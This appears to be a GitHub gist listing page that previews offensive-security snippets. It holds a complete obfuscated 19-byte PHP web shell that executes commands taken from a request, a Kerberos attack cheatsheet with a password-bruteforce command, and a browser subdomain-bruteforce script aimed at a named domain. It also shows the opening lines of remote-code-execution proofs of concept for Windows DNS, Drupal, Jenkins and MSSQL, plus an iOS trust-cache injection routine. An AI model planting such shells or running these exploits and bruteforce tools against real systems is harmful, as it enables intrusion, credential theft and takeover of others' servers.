joaovarelas / CVE-2020-1350.py

Created July 16, 2020 21:36

	#!/usr/bin/env python3

	"""cve-2020-1350.py: Windows DNS Server Vulnerability"""

	__author__ = "@joaovarelas"
	__date__ = "July, 2020"

	import binascii,socket,struct

	from dnslib import *

terjanq / rev_shell.php

Last active December 27, 2024 14:54

The shortest non-alphanumeric reverse shell script (19 bytes)

	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:

asdqwe3124 / gd-gif.php

Last active October 8, 2023 03:27

	<?php

	//php gd-gif.php image.gif gd-image.gif

	$gif = imagecreatefromgif($argv[1]);
	imagegif($gif, $argv[2]);
	imagedestroy($gif);
	?>

marzavec / run.js

Created August 8, 2019 16:43

Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)

	/*
	Developer: Marzavec ( https://github.com/marzavec )
	Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
	Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
	*/

	const rootTld = 'lyka.pro'; // change to your target's root tld

	// url to newline seperated wordlist
	const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';

zeropwn / Axway SecureTransport 5.x Unauthenticated XXE

Last active November 17, 2023 08:59

Axway SecureTransport 5.x Unauthenticated XML Injection / XXE

TarlogicSecurity / kerberos_attacks_cheatsheet.md

Created May 14, 2019 13:33

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

leonjza / cve-2019-6340.py

Last active February 27, 2020 18:39

CVE-2019-6340

	#!/usr/bin/env python3

	# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
	# 2019 @leonjza

	# Technical details for this exploit is available at:
	# https://www.drupal.org/sa-core-2019-003
	# https://www.ambionics.io/blog/drupal8-rce
	# https://twitter.com/jcran/status/1099206271901798400

Proteas / inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c

Last active October 22, 2023 11:31

	void inject_trusts(int pathc, const char *paths[])
	{
	printf("[+] injecting into trust cache...\n");

	extern uint64_t g_kern_base;

	static uint64_t tc = 0;
	if (tc == 0) {
	/* loaded_trust_caches
	iPhone11,2-4-6: 0xFFFFFFF008F702C8

adamyordan / CVE-2019-1003000-Jenkins-RCE-POC.py

Last active July 29, 2019 09:29

CVE-2019-1003000-Jenkins-RCE-POC

	#!/usr/bin/python

	# Author: Adam Jordan
	# Date: 2019-02-15
	# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
	# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


	import argparse
	import jenkins

3xocyte / bad_sequel.py

Last active January 31, 2026 22:13

PoC MSSQL RCE exploit using Resource-Based Constrained Delegation

	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use